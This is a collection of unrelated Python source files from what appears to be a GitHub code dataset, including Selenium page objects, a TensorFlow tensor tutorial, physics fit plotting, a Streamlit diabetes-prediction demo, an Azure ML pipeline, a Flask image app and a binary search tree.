\"COM3\"\nelse:\n windowsos = False\n mydir = \"/home/pi/chessreal4/images/\"\n serialport = '/dev/ttyACM0'\n\n","repo_name":"rpd123/chess-robot","sub_path":"version1-old/CBstate.py","file_name":"CBstate.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"37573398328","text":"import re\n\nfrom oct.pages.base.elements import Block, Element, Link, Clickable\nfrom oct.pages.base.page import BasePage\n\n\nclass ButtonGroup(Block):\n\n contains = {\n \"reorder\": {\"locator\": (\"CLASS_NAME\", \"btn-primary\"), \"class\": Clickable},\n \"return_product\": {\"locator\": (\"CLASS_NAME\", \"btn-danger\"), \"class\": Link},\n }\n\n\nclass OrderTableRow(Block):\n\n contains = {\n \"product_name\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(1)\"), \"class\": Element},\n \"model\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(2)\"), \"class\": Element},\n \"quantity\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(3)\"), \"class\": Element},\n \"price\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(4)\"), \"class\": Element},\n \"total\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(5)\"), \"class\": Element},\n \"actions\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(6)\"), \"class\": ButtonGroup},\n }\n\n\nclass OrderTable(Block):\n\n contains = {\n \"rows\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[1]/table/tbody'),\n \"class\": OrderTableRow,\n \"is_loaded\": True,\n }\n }\n\n\nclass Summary(Block):\n\n contains = {\n \"subtotal\": {\n \"locator\": (\"CSS_SELECTOR\", \"tr:nth-child(1) > td:nth-child(3)\"),\n \"class\": Element,\n },\n \"flat_shipping_rate\": {\n \"locator\": (\"CSS_SELECTOR\", \"tr:nth-child(2) > td:nth-child(3)\"),\n \"class\": Element,\n },\n \"total\": {\n \"locator\": (\"CSS_SELECTOR\", \"tr:nth-child(3) > td:nth-child(3)\"),\n \"class\": Element,\n },\n }\n\n\nclass OrderHistory(Block):\n\n contains = {\n \"date_added\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(1)\"), \"class\": Element},\n \"status\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(2)\"), \"class\": Element},\n \"comment\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(3)\"), \"class\": Element},\n }\n\n\nclass OrderInfoPage(BasePage):\n\n url = 
\"index.php?route=account/order/info&order_id=\"\n\n def __init__(self, order_id: int):\n super().__init__()\n self.url = f\"{self.url}{order_id}\"\n\n contains = {\n \"order_details\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[1]/tbody'),\n \"class\": Block,\n },\n \"payment_address\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[2]/tbody/tr/td[1]'),\n \"class\": Block,\n },\n \"shipping_address\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[2]/tbody/tr/td[2]'),\n \"class\": Block,\n },\n \"orders\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[1]/table/tbody'),\n \"class\": OrderTable,\n },\n \"summary\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[1]/table/tfoot'),\n \"class\": Summary,\n },\n \"order_history\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[3]/tbody'),\n \"class\": OrderHistory,\n },\n \"continue_btn\": {\"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[2]/div/a'), \"class\": Link},\n }\n\n def get_order_details(self) -> dict:\n\n raw = re.sub(\"\\n\", \" \", self.order_details.text)\n reg_ex = re.compile(\n r\"Order ID: (.*) Date Added: (.*) Payment Method: (.*) Shipping Method: (.*)\"\n )\n match = [i for i in reg_ex.search(raw).groups()]\n\n return {\n \"order_id\": match[0],\n \"date_added\": match[1],\n \"payment_method\": match[2],\n \"shipping_method\": match[3],\n }\n\n def get_payment_address_details(self) -> list:\n return self.payment_address.text.split(\"\\n\")\n\n def get_shipping_address_details(self) -> list:\n return self.shipping_address.text.split(\"\\n\")\n","repo_name":"ITA-Dnipro/dp-195-taqc-python","sub_path":"oct/pages/models/order_info_page.py","file_name":"order_info_page.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37377472183","text":"\"\"\"\r\n14. 텐서플로의 구조 자세히 알아보기 (14.1 ~ 14.3)\r\n14.2 - Tensor의 rank, shape\r\n14.3 - tf.constant <-> numpy.array\r\n tf.reshape, tf.transpose(perm), tf.split, tf.concat\r\n\r\n14.4 - tf1 <-> tf2의 차이 (graph 관점)\r\n14.5 - tf.Variable (.numpy() = np type)\r\n - tf.Variable.assign(value)\r\n\r\n\"\"\"\r\n#===== Tensorflow 사용시 발생하는 메시지 숨기기 =====#\r\n# import os\r\n# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nfrom default import *\r\n\r\n\r\n\"\"\"\r\n14.2. Rank of Tensor\r\n\"\"\"\r\n#===== Tensorflow의 차원 구하는 방법(rank, shape) =====#\r\n\r\n# scalar - 0차원 텐서 (rank-0 tensor)\r\n# vector - 1차원 텐서 (rank-1 tensor)\r\n# matrix(행렬) - 2차원 텐서 (rank-2 tensor)\r\nimport tensorflow as tf\r\nimport numpy as np\r\nprint(\"14.2\")\r\nt1 = tf.constant(np.pi) #rank-0 , size = ()\r\nt2 = tf.constant([1,2,3,4]) #rank-1, size = (4,) # [[]] 꼴이어야 (4,1)\r\nt3 = tf.constant([[1,2],[3,4]]) #rank-2, size = (2,2)\r\n\r\n#get rank of tensor\r\nr1 = tf.rank(t1)\r\nr2 = tf.rank(t2)\r\nr3 = tf.rank(t3)\r\n\r\n## 크기를 구합니다\r\ns1 = t1.get_shape()\r\ns2 = t2.get_shape()\r\ns3 = t3.get_shape()\r\nprint('크기:', s1, s2, s3)\r\n\r\nprint('랭크:', \r\n r1.numpy(), \r\n r2.numpy(), \r\n r3.numpy())\r\n\r\n\r\n\r\n\"\"\"\r\n14.3. Tensor --> numpy.array\r\n\"\"\"\r\n#===== Tensorflow constant와 numpy arr의 호환성 =====#\r\n\r\n# tensor => tf.constant(value).get_shape() # .shape도 작동함\r\n# numpy => np.array(value).shape\r\n\r\nprint(\"\\n\\n14.3\")\r\narr = np.array([[1., 2., 3., 3.5],\r\n [4., 5., 6., 6.5],\r\n [7., 8., 9., 9.5]])\r\nT1 = tf.constant(arr) #np.array를 바로 tf.constant(텐서)로 변환가능\r\nprint(T1)\r\ns = T1.get_shape()\r\n\r\n#아래 두개의 출력값 동일!! 
[ .get_shape() = .shape , attribute로 존재]\r\nprint('T1의 크기:', s)\r\nprint('T1의 크기:', T1.shape)\r\n\r\n\r\nT2 = tf.Variable(np.random.normal(size=s)) #get_shape로 얻은 (3,4)꼴의 input을 size로 넣어줌. np에서 제공하는 기능\r\nprint('<Value of T2>\\n',T2)\r\nT3 = tf.Variable(np.random.normal(size=s[0])) #size=3 -> (3,)과 동일!\r\nprint('<Value of T3>\\n',T3)\r\nT3_2 = tf.Variable(np.random.normal(size=(3,))) #size=(3,)\r\nprint('<Value of T3_2>\\n',T3_2)\r\n\r\n# value of T1\r\n#[[1. 2. 3. 3.5]\r\n# [4. 5. 6. 6.5]\r\n# [7. 8. 9. 9.5]], shape=(3, 4), dtype=float64)\r\n\r\n\"\"\"\r\nTensorflow를 이용한 행렬 변형 (reshape, transpose(with perm), split, concat)\r\n\"\"\"\r\n#===== tensorflow reshape =====#\r\n\r\nT4 = tf.reshape(T1, shape=[1, 1, -1])\r\nprint('<Value of T4>\\n',T4)\r\nT5 = tf.reshape(T1, shape=[1, 3, -1])\r\nprint('<Value of T5>\\n',T5)\r\n\r\n# Transpose of Matrix\r\n# Numpy에서는...\r\n# arr.T arr.transpose() np.transpose(arr)\r\n# TensorFlow에서는...\r\n# tf.transpose(arr)\r\n\r\n\r\n\r\n#===== tensorflow split =====#\r\nT_temp = tf.transpose(T1)\r\nprint('<Value of T_temp>\\n',T_temp)\r\n\r\n#T5.shape = (1,3,4)\r\nT6 = tf.transpose(T5, perm=[2, 1, 0]) # perm => 0,1,2로 입력해야함. 각각이 0-dim 1-dim 2-dim\r\nprint('<Value of T6>\\n',T6)\r\nprint('<Dim of T6>\\n',T6.shape)\r\n#T6.shape = (4,3,1)\r\nT7 = tf.transpose(T5, perm=[0, 2, 1])\r\nprint('<Value of T7>\\n',T7)\r\n#T6.shape = (1,4,3)\r\n\r\n\r\n\r\n#===== tensorflow split =====#\r\n\r\nt5_splt = tf.split(T5, \r\n num_or_size_splits=2, \r\n axis=2)\r\n# 결과는 tf tensor의 list!\r\n\r\nprinting(t5_splt) #dimension : (1,3,4) => (1,3,2)\r\n\r\n# t5_split_2 = tf.split(T5, \r\n# num_or_size_splits=2, \r\n# axis=1)\r\n# 불가능 => 열이 3개로, 2의 배수가 아니기 때문\r\nt5_splt_2 = tf.split(T5, \r\n num_or_size_splits=3, \r\n axis=1)\r\nprinting(t5_splt_2) #dimension : (1, 3, 4) => (1, 1, 4)\r\nt5_splt_2_0 = t5_splt_2[0]\r\nprint(t5_splt_2_0)\r\n\r\n\r\n\r\n#===== tensorflow concat =====#\r\n\r\nt1 = tf.ones(shape=(5, 1), dtype=tf.float32)\r\nt2 = tf.zeros(shape=(5, 1), dtype=tf.float32)\r\nprinting(t1)\r\nprinting(t2)\r\n\r\nt3 = tf.concat([t1, t2], axis=0) #행방향으로 한칸씩 진행하면서 합성(하나끝나서 진행 불가능하면 그제서야 다음꺼 concat!)\r\nprinting(t3) #즉, 행방향으로 array가 길어짐\r\nprint(t3.shape)\r\nt4 = tf.concat([t1, t2], axis=1) #��방향으로 한칸씩 진행하면서 합성(하나끝나서 진행 불가능하면 그제서야 다음꺼 concat!)\r\nprinting(t4) #즉, 열방향으로 array가 길어짐\r\nprint(t4.shape)\r\n","repo_name":"prorata12/ML-self-study","sub_path":"Chapter14/ch14_1.py","file_name":"ch14_1.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8765203696","text":"import os\nimport json\n\nimport ROOT\nROOT.gROOT.SetBatch(ROOT.kTRUE)\n\nimport DevTools.Plotter.CMS_lumi as CMS_lumi\nimport DevTools.Plotter.tdrstyle as tdrstyle\n\nROOT.gROOT.ProcessLine(\"gErrorIgnoreLevel = 2001;\")\ntdrstyle.setTDRStyle()\n\nisprelim = False\nbr = 0.0005\n\ndef floatToText(x):\n s = '{:.1E}'.format(x).split('E')\n return '{} #times 10^{{{}}}'.format(int(float(s[0])),int(s[1]))\n\ndef get_rooplot(tfile,name,doUnc):\n # get the postfit result\n rooplot = tfile.Get(name)\n fittree = tfile.Get('tree_fit_sb')\n fittree.GetEntry(0)\n \n # remove things we dont want\n # rooplot.remove(\"name\")\n objToRemove = []\n objs = []\n for i in range(7):\n obj = rooplot.nameOf(i)\n o = rooplot.getObject(i)\n objs += [obj]\n if 'pdf' in obj and not ('Comp' in obj or 'errorband' in obj):\n objToRemove += [obj]\n if not doUnc and 'errorband' in obj:\n objToRemove += [obj]\n # scale the signal to desired br\n if 'Sig' in 
obj:\n for j in range(o.GetN()):\n if fittree.r: o.GetY()[j] *= br/(fittree.r * 0.001)\n for obj in objToRemove:\n rooplot.remove(obj)\n\n return rooplot\n \n\ndef plot(h,a,dim,region,mode,doUnc):\n var = 'CMS_haa_{}'.format(dim)\n if region=='control': var += '_control'\n fname = 'temp_fitDiagnostics/{h}_{a}/fitDiagnostics.Test.root'.format(h=h,a=a)\n\n tfile = ROOT.TFile.Open(fname)\n\n rooplot = get_rooplot(tfile,'{}_{}_{}'.format(region,var,mode),doUnc)\n \n canvas = ROOT.TCanvas('c','c',50,50,800,600)\n canvas.SetRightMargin(0.05)\n \n rooplot.Draw()\n mi = rooplot.GetMinimum()\n if mi<0:\n rooplot.SetMinimum(0.1)\n \n if 'x' in var:\n rooplot.GetXaxis().SetTitle('m(#mu#mu) (GeV)')\n rooplot.GetYaxis().SetTitle('Events / 0.2 GeV')\n if a<8.5: \n rooplot.GetXaxis().SetRangeUser(2.5,8.9)\n canvas.SetLogy()\n rooplot.SetMaximum(2000)\n if a>8.5 and a<11.5:\n rooplot.SetMaximum(60)\n if a>11.5:\n rooplot.SetMaximum(15)\n if region=='control': rooplot.GetYaxis().SetTitle('Events / 0.02 GeV')\n else:\n rooplot.GetXaxis().SetTitle('m(#mu#mu#tau_{#mu}#tau_{h}) (GeV)')\n rooplot.GetYaxis().SetTitle('Events / 20 GeV')\n rooplot.GetXaxis().SetRangeUser(0,800)\n canvas.SetLogy()\n rooplot.SetMaximum(2000)\n if region=='control':\n rooplot.SetMaximum(1e6)\n rooplot.SetMinimum(100)\n \n \n CMS_lumi.cmsText = 'CMS'\n CMS_lumi.writeExtraText = isprelim\n CMS_lumi.extraText = 'Preliminary'\n CMS_lumi.lumi_13TeV = \"%0.1f fb^{-1}\" % (35.9)\n CMS_lumi.CMS_lumi(canvas,4,11)\n \n \n legend = ROOT.TLegend(0.4,0.6,0.92,0.92)\n legend.SetTextFont(42)\n legend.SetBorderSize(0)\n legend.SetFillColor(0)\n #legend.SetNColumns(2)\n \n foundSig = False\n foundObs = False\n for prim in canvas.GetListOfPrimitives():\n if 'h_{}'.format(region) in prim.GetName():\n if foundObs: continue\n foundObs = True\n title = 'Observed'\n legend.AddEntry(prim, title, 'ep')\n elif 'Bkg' in prim.GetName():\n prim.SetLineColor(ROOT.kBlue)\n legend.AddEntry(prim, 'Background Model', 'l')\n elif 'errorband' in prim.GetName():\n prim.SetLineColor(ROOT.kOrange)\n legend.AddEntry(prim, 'Uncertainty', 'f')\n elif 'Sig' in prim.GetName():\n prim.SetLineColor(ROOT.kRed)\n if foundSig: continue\n foundSig = True\n title = '#splitline{{m_{{H}} = {} GeV, m_{{a}} = {} GeV}}{{B(h #rightarrow aa #rightarrow #mu#mu#tau#tau) = {}}}'.format(h,a,floatToText(br))\n #title = 'm_{{H}} = {} GeV, m_{{a}} = {} GeV'.format(h,a)\n legend.AddEntry(prim, title, 'l')\n \n legend.Draw()\n \n canvas.Print('haa_mm_h_{}_{}_{}_{}_{}{}.png'.format(region,var,mode,h,a,'' if doUnc else '_noUnc'))\n canvas.Print('haa_mm_h_{}_{}_{}_{}_{}{}.pdf'.format(region,var,mode,h,a,'' if doUnc else '_noUnc'))\n\nfor doUnc in [True,False]:\n for mode in ['fit_s','fit_b']:\n for h in [125,300,750]:\n for a in [7,9,15]:\n for region in ['PP','FP','control']:\n plot(h,a,'x',region,mode,doUnc)\n if region!='control': plot(h,a,'y',region,mode,doUnc)\n\n","repo_name":"red1habibullah/CombineLimitsRunII","sub_path":"Plotter/python/plot_fitDiagnostics_old.py","file_name":"plot_fitDiagnostics_old.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11126426521","text":"# Diabetes Detector\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom PIL import Image\n\n#!pip install -q streamlit\n\nimport streamlit as st\nst.set_page_config(layout=\"wide\")\nst.write(\"\"\"\n# 
Welcome to Diabetes Detection Webpage\n\"\"\")\nst.write('*******')\nimage = Image.open('Capture.JPG')\n\n#image\n\n# st.image(image,caption='ML',use_column_width=True)\n\ndf = pd.read_csv('diabetes.csv')\n\n#df\n\n# st.subheader('Data Information :')\n# st.dataframe(df)\n# st.write(df.describe())\n\n# chart = st.bar_chart(df)\n\ny = df['Outcome']\n\nX = df.drop(['Outcome'],axis=1)\n\n#X\n\n#y\n\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25,random_state=0)\n\n# Get the feature input from users\n\n# X.columns\n\n# X['Insulin'].max()\n\ndef get_user_input():\n Pregnancies = st.sidebar.slider('Pregnancies',0,17,3)\n Glucose = st.sidebar.slider('Glucose',0,199,117)\n BloodPressure = st.sidebar.slider('BloodPressure',0,160,72)\n SkinThickness = st.sidebar.slider('SkinThickness',0,99,23)\n Insulin = st.sidebar.slider('Insulin',0.0,846.0,30.0)\n BMI = st.sidebar.slider('BMI',0.0,67.1,32.0)\n DiabetesPedigreeFunction = st.sidebar.slider('Diab. Pedigree Func',0.078,2.42,0.3725)\n Age = st.sidebar.slider('Age',20,100,30)\n\n user_data = {'Pregnancies': Pregnancies,\n 'Glucose' : Glucose,\n 'BloodPressure' : BloodPressure,\n 'SkinThickness' : SkinThickness,\n 'Insulin': Insulin,\n 'BMI': BMI,\n 'DiabetesPedigreeFunction': DiabetesPedigreeFunction,\n 'Age': Age\n }\n features = pd.DataFrame(user_data,index =[0])\n return features\n\nuser_input = get_user_input()\n\nst.subheader('Patient entered medical data (as selected via slider on the left) : ')\n\nst.write(user_input)\n\nRandomForestClassifier = RandomForestClassifier()\nRandomForestClassifier.fit(X_train,y_train)\n\nprediction = RandomForestClassifier.predict(user_input)\n\n# st.subheader('Machine Learning Model Prediction: Patient is - ')\n# st.write(prediction)\n\nif prediction == 1:\n st.subheader('Machine Learning Model Prediction : Member is diabetic')\nelse:\n st.subheader('Machine Learning Model Prediction : Member is non-diabetic')\n\nst.subheader('Machine Learning Model Confidence level(Test Accuracy Score) is :')\nst.write(str(accuracy_score(y_test,RandomForestClassifier.predict(X_test)) *100) +'%')\n","repo_name":"DineshAnalyticsandAI/Diabetes-Detection","sub_path":"diabetes.py","file_name":"diabetes.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32307147578","text":"from azureml.pipeline.core.graph import PipelineParameter\r\nfrom azureml.pipeline.steps import RScriptStep, PythonScriptStep\r\nfrom azureml.pipeline.core import Pipeline\r\nfrom azureml.core import Workspace, Model\r\nfrom azureml.core.experiment import Experiment\r\nfrom azureml.core.runconfig import RunConfiguration, CondaDependencies\r\nfrom azureml.core import Dataset, Datastore\r\nfrom dotenv import load_dotenv\r\nimport os\r\nimport sys\r\nsys.path.append(os.path.abspath(\"./util\")) \r\nfrom attach_compute import get_compute\r\nfrom env_variables import Env\r\nfrom azureml.core.authentication import ServicePrincipalAuthentication\r\n\r\ndef main():\r\n e = Env()\r\n print(e.workspace_name)\r\n\r\n svc_pr = ServicePrincipalAuthentication(\r\n tenant_id=os.environ.get(\"TENANT_ID\"),\r\n service_principal_id=os.environ.get(\"AZURE_SP_ID\"),\r\n service_principal_password=os.environ.get(\"AZURE_SP_PASSWORD\"))\r\n\r\n # Get Azure machine learning workspace\r\n ws = Workspace.get(\r\n name=os.environ.get(\"WORKSPACE_NAME\"),\r\n subscription_id=os.environ.get(\"SUBSCRIPTION_ID\"),\r\n 
resource_group=os.environ.get(\"AZURE_RESOURCE_GROUP\")\r\n ,auth=svc_pr\r\n )\r\n\r\n #ex = Experiment(ws, 'iris-pipeline')\r\n #ex.archive()\r\n\r\n print(\"get_workspace:\")\r\n print(ws)\r\n ws.write_config(path=\"\", file_name=\"config.json\")\r\n print(\"writing config.json.\")\r\n\r\n # Get Azure machine learning cluster\r\n aml_compute = get_compute(\r\n ws,\r\n \"train-cluster\",\r\n \"STANDARD_DS2_V2\")\r\n if aml_compute is not None:\r\n print(\"aml_compute:\")\r\n print(aml_compute)\r\n\r\n run_config = RunConfiguration(conda_dependencies=CondaDependencies.create(\r\n conda_packages=['numpy', 'pandas',\r\n 'scikit-learn', 'tensorflow', 'keras'],\r\n pip_packages=['azure', 'azureml-core',\r\n 'azureml-pipeline',\r\n 'azure-storage',\r\n 'azure-storage-blob',\r\n 'azureml-dataprep'])\r\n )\r\n run_config.environment.docker.enabled = True\r\n\r\n ######### TRAIN ################\r\n train_step = PythonScriptStep(\r\n name=\"Train\",\r\n source_directory=\"models/python/iris/train\",\r\n script_name=\"train.py\",\r\n compute_target=aml_compute,\r\n arguments=[\r\n ],\r\n runconfig=run_config,\r\n allow_reuse=False,\r\n )\r\n print(\"Train Step created\")\r\n\r\n ######### EVALUATE ################\r\n evaluate_step = PythonScriptStep(\r\n name=\"Evaluate\",\r\n source_directory=\"models/python/iris/evaluate\",\r\n script_name=\"evaluate.py\",\r\n compute_target=aml_compute,\r\n arguments=[\r\n ],\r\n runconfig=run_config,\r\n allow_reuse=False,\r\n )\r\n print(\"Evaluate Step created\")\r\n\r\n ######### REGISTER ################\r\n register_step = PythonScriptStep(\r\n name=\"Register\",\r\n source_directory=\"models/python/iris/register\",\r\n script_name=\"register.py\",\r\n compute_target=aml_compute,\r\n arguments=[\r\n ],\r\n runconfig=run_config,\r\n allow_reuse=False,\r\n )\r\n print(\"Register Step created\")\r\n\r\n #evaluate_step.run_after(train_step)\r\n register_step.run_after(train_step)\r\n steps = [train_step, register_step]\r\n train_pipeline = Pipeline(workspace=ws, steps=steps)\r\n train_pipeline._set_experiment_name\r\n train_pipeline.validate()\r\n\r\n published_pipeline = train_pipeline.publish(\r\n name=\"iris-pipeline\",\r\n description=\"\"\r\n )\r\n print(f'Published pipeline: {published_pipeline.name}')\r\n print(f'for build {published_pipeline.version}')\r\n\r\n pipeline_parameters = { \r\n \"model_name\": \"iris-pipeline-param\" \r\n }\r\n run = published_pipeline.submit(\r\n ws,\r\n \"iris-pipeline-experiment\",\r\n pipeline_parameters\r\n )\r\n #run.wait_for_completion(show_output=True)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"p3ngu1nx/aml-pipeline-deploy","sub_path":".ipynb_checkpoints/create-checkpoint.py","file_name":"create-checkpoint.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1450036527","text":"from flask import Flask, request, render_template, send_file\nfrom PIL import Image, ImageEnhance\nfrom io import BytesIO\nimport io\nfrom werkzeug.datastructures import FileStorage\n# from skimage import io\n# from werkzeug import secure_filename\n\napp = Flask(__name__)\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n title = 'This is Fix Image App!!'\n \n if request.method == 'GET':\n return render_template('index.html', title=title)\n # else:\n # f = request.files['file']\n # print(\"f is :\"+ str(f))\n # img_bright = f.point(lambda x:x*1.8)\n \n # return send_file(img_bright,\n # 
attachment_filename=f.filename,\n # as_attachment=True)\n else:\n f = request.files['file']\n buf = io.BytesIO()\n # adjust_contrast(f, buf, 1.7)\n adjust_bright(f, buf, 1.7)\n buf.seek(0)\n\n return send_file(buf,\n attachment_filename=f.filename,\n as_attachment=True)\n \n# def adjust_contrast(input_image, output_image, factor):\n# image = Image.open(input_image)\n# enhancer_object = ImageEnhance.Contrast(image)\n# out = enhancer_object.enhance(factor)\n# out.save(output_image, 'JPEG')\n\ndef adjust_bright(input_image, output_image, factor):\n image = Image.open(input_image)\n enhancer_object = ImageEnhance.Brightness(image)\n out = enhancer_object.enhance(factor)\n out.save(output_image, 'JPEG')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"yukiozawa/fix_image","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39232824362","text":"import cv2\nimport os\nwhile True:\n file = \"bg.gif\"\n cap = cv2.VideoCapture(file)\n\n if not cap.isOpened():\n print(\"ERROR OPENING GIF\")\n exit()\n\n fps = cap.get(cv2.CAP_PROP_FPS)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n output_dir = \"temp_frames\"\n os.makedirs(output_dir, exist_ok=True)\n\n for frame_number in range(total_frames):\n ret,frame = cap.read()\n if not ret:\n break\n\n temp_image_path = os.path.join(output_dir,f\"frame_{frame_number:04d}.png\")\n cv2.imwrite(temp_image_path,frame)\n os.system(f\"nitrogen --set-zoom-fill --save { temp_image_path }\")\n\n cap.release()\n","repo_name":"mk020846/nitrogen_animated_background","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42602625022","text":"import os\nimport time\n\nfrom google.protobuf import text_format\nfrom absl import app\nfrom absl import flags\nfrom tensorflow import gfile\nimport tensorflow as tf\nfrom ffn.utils import bounding_box_pb2\nfrom ffn.inference import inference\nfrom ffn.inference import inference_flags\nimport train_functional\n\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('bounding_box', None,\n 'BoundingBox proto in text format defining the area '\n 'to segmented.')\n\n\ndef main(unused_argv):\n request = inference_flags.request_from_flags()\n if not gfile.Exists(request.segmentation_output_dir):\n gfile.MakeDirs(request.segmentation_output_dir)\n\n bbox = bounding_box_pb2.BoundingBox()\n text_format.Parse(FLAGS.bounding_box, bbox)\n\n # Training\n import os\n batch_size = 16\n max_steps = 3000#10*250/batch_size #250\n hdf_dir = os.path.split(request.image.hdf5)[0]\n load_ckpt_path = request.model_checkpoint_path\n save_ckpt_path = os.path.split(load_ckpt_path)[0]+'_topup_'+ os.path.split(os.path.split(hdf_dir)[0])[1]\n # import ipdb;ipdb.set_trace()\n with tf.Graph().as_default():\n with tf.device(tf.train.replica_device_setter(FLAGS.ps_tasks, merge_devices=True)):\n # SET UP TRAIN MODEL\n print('>>>>>>>>>>>>>>>>>>>>>>SET UP TRAIN MODEL')\n\n TA = train_functional.TrainArgs(train_coords= os.path.join(hdf_dir, 'tf_record_file'),\n data_volumes='jk:' + os.path.join(hdf_dir, 'grayscale_maps.h5') + ':raw',\n label_volumes='jk:' + os.path.join(hdf_dir, 'groundtruth.h5') + ':stack',\n train_dir=save_ckpt_path,\n model_name=request.model_name,\n model_args=request.model_args,\n image_mean=request.image_mean,\n image_stddev=request.image_stddev,\n 
max_steps=max_steps,\n optimizer='adam',\n load_from_ckpt=load_ckpt_path,\n batch_size=batch_size)\n global TA\n model_class = import_symbol(TA.model_name)\n seed = int(time.time() + TA.task * 3600 * 24)\n logging.info('Random seed: %r', seed)\n random.seed(seed)\n eval_tracker, model, secs, load_data_ops, summary_writer, merge_summaries_op = \\\n build_train_graph(model_class, TA,\n save_ckpt=False, with_membrane=TA.with_membrane, **json.loads(TA.model_args))\n\n\n # SET UP INFERENCE MODEL\n print('>>>>>>>>>>>>>>>>>>>>>>SET UP INFERENCE MODEL')\n print('>>>>>>>>>>>>>>>>>>>>>>COUNTED %s VARIABLES PRE-INFERENCE' % len(tf.trainable_variables()))\n runner = inference.Runner()\n runner.start(\n request,\n batch_size=1,\n topup={'train_dir': FLAGS.train_dir},\n reuse=tf.AUTO_REUSE,\n tag='_inference') #TAKES SESSION\n print('>>>>>>>>>>>>>>>>>>>>>>COUNTED %s VARIABLES POST-INFERENCE' % len(tf.trainable_variables()))\n\n # START TRAINING\n print('>>>>>>>>>>>>>>>>>>>>>>START TOPUP TRAINING')\n sess = train_functional.train_ffn(\n TA, eval_tracker, model, runner.session, load_data_ops, summary_writer, merge_summaries_op)\n\n # saver.save(sess, \"/tmp/model.ckpt\")\n\n # START INFERENCE\n print('>>>>>>>>>>>>>>>>>>>>>>START INFERENCE')\n # saver.restore(sess, \"/tmp/model.ckpt\")\n runner.run((bbox.start.z, bbox.start.y, bbox.start.x),\n (bbox.size.z, bbox.size.y, bbox.size.x))\n\n counter_path = os.path.join(request.segmentation_output_dir, 'counters.txt')\n if not gfile.Exists(counter_path):\n runner.counters.dump(counter_path)\n\n sess.close()\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"drewlinsley/ffn_membrane","sub_path":"run_inference_multi.py","file_name":"run_inference_multi.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26783905083","text":"class Node:\r\n def __init__(self, index=-1, symbol=\"\"):\r\n self.left = None\r\n self.right = None\r\n self.index = index\r\n self.symbol = symbol\r\n\r\n\r\nclass BST:\r\n def __init__(self):\r\n self.count = 0\r\n self.root = None\r\n\r\n def insert_recursive(self, root, node):\r\n if root is None:\r\n self.root = node\r\n else:\r\n if root.symbol < node.symbol:\r\n if root.right is None:\r\n root.right = node\r\n else:\r\n self.insert_recursive(root.right, node)\r\n else:\r\n if root.left is None:\r\n root.left = node\r\n else:\r\n self.insert_recursive(root.left, node)\r\n\r\n def in_order_print(self, root):\r\n if root:\r\n self.in_order_print(root.left)\r\n print(f\"Symbol: {root.symbol} - Code: {root.index}\")\r\n self.in_order_print(root.right)\r\n\r\n def search_recursive(self, root, symbol):\r\n if root is None or root.symbol == symbol:\r\n return root\r\n\r\n if root.symbol < symbol:\r\n return self.search_recursive(root.right, symbol)\r\n else:\r\n return self.search_recursive(root.left, symbol)\r\n\r\n def search(self, symbol):\r\n return self.search_recursive(self.root, symbol)\r\n\r\n def insert(self, key):\r\n index = self.search(key)\r\n\r\n if index != -1 and index is not None:\r\n return index.index\r\n else:\r\n self.insert_recursive(self.root, Node(self.count, key))\r\n self.count += 1\r\n return self.count - 1\r\n\r\n def print(self):\r\n self.in_order_print(self.root)\r\n\r\n","repo_name":"polk15/FLCD","sub_path":"BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
